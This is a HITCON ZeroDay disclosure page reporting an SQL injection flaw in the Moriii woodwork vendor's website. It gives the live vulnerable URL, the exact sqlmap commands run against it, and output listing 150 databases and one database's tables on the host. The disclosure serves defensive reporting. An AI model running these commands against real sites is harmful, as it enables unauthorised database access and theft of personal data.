森手木工Moriii SQLi漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2022-00717
  •  發信 Vendor: 森手木工Moriii
  • Title: 森手木工Moriii SQLi漏洞
  • Introduction: 此網站存在SQLi漏洞

處理狀態

目前狀態

公開
Last Update : 2022/11/05
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2022/09/05 11:33:07 : 新提交 (由 百鬼夜行 更新此狀態)
  • 2022/09/05 11:34:08 : 新提交 (由 百鬼夜行 更新此狀態)
  • 2022/09/07 18:47:32 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/07 18:47:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/20 15:30:56 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/20 15:30:56 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/09/20 15:30:56 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2022/11/05 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2022-00717
  • 通報者:bpejfjsp1 (百鬼夜行)
  • 風險:中
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

http://moriii.com.tw/p/?c=107

敘述

我無聊找個網站戳戳看

發現這個網站存在SQLi漏洞
詳圖
sqlmap -u http://moriii.com.tw/p/?c=107 --dbs

圖片
圖片
available databases [150]:
[] agl
[
] akuma
[] angelcapital
[
] bamboo
[] bb1
[
] berkeley
[] berkeley190912
[
] berkeley_bk
[] berkeleytest
[
] better168
[] binjiang
[
] bonvoyage
[] cal_5555
[
] cal_691_share
[] cal_app
[
] cal_artest
[] cal_balloon
[
] cal_casterdesign
[] cal_clear
[
] cal_CXC
[] cal_designhouse
[
] cal_edisonchenya
[] cal_goodog
[
] cal_iyson
[] cal_kofpk
[
] cal_nckubamboonight4mv
[] cal_never2
[
] cal_newhomeland
[] cal_Oneplus
[
] cal_OSK-AUTOMOTIVE
[] cal_ren
[
] cal_rockytallen
[] cal_rwd
[
] cal_shian.lin
[] cal_shien
[
] cal_ShiftStudio
[] cal_TAIWANCOSMO
[
] cal_test
[] cal_TestDreamer
[
] cal_tiger-chou
[] cal_TM
[
] cal_umai
[] cal_undersky
[
] cal_X-INNOVATION
[] cal_xinyu
[
] cal_zy-ba
[] calendar
[
] centurion
[] centurionbk
[
] centurionkh
[] centuriont
[
] centuriontest
[] cheng
[
] chiayuen
[] chiayuent
[
] chicken
[] cocobet
[
] cocobet2
[] colette
[
] ctest
[] devil
[
] earlybird
[] ebshopee
[
] fuhjen
[] funworld
[
] fuss
[] goodbrand
[
] goodfood
[] gotoo
[
] gotoosys
[] gotw
[
] gotwon
[] gotwonback
[
] hioyo
[] hioyobk
[
] hioyocn
[] hioyoecn
[
] hioyoetw
[] hioyoimaker
[
] hioyosml
[] hioyot
[
] hioyotegog
[] hioyov2
[
] hioyov2t
[] hioyov3
[
] hioyov3t
[] honey
[
] hslow
[] hydroseal
[
] iimage
[] iimaget
[
] information_schema
[] inkdog
[
] inkdog2
[] jialoobi
[
] kashmen
[] kashmen_en
[
] ler
[] lifeartc_2014web
[
] light
[] lobos
[
] lobos2
[] moriii
[
] moriiit
[] mountsst_8life
[
] mountsst_bnnbee
[] mountsst_chishanxun_shop
[
] mountsst_dynamic5
[] mountsst_el
[
] mountsst_ivette
[] mountsst_mounts
[
] mountsst_robogo
[] mountsst_tang
[
] mountsst_tang_en
[] mountsst_test
[
] mountsst_wanpo
[] mysql
[
] never2
[] never2t
[
] noz
[] nozt
[
] oh-goodog
[] pingcn
[
] playballoon
[] pms_clear
[
] recfun
[] recfunrd
[
] ren
[] renen
[
] renfr
[] rent
[
] rentt
[] shengle
[
] skg
[] skgasia
[
] skyeye
[] sskg
[
] sunmoonegg
[] ten
[
] tent
[] topgo
[
] turnfitness
[] wdcpdb
[
] webgtw_akuma
[] webgtw_twenergy
[
] wordpress
[] wordpress_old
[
] wu
[] ya-noldcomtw
[
] yzz

圖片
[9 tables]
+-------------+
| yzz_admin |
| yzz_count |
| yzz_html |
| yzz_product |
| yzz_sno |
| yzz_store |
| yzz_td |
| yzz_tr |
| yzz_vip |
+-------------+

sqlmap -u "http://moriii.com.tw/p/?c=107" -D "yzz" --tables

為了秉持不看資料原則
我戳到點就好

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;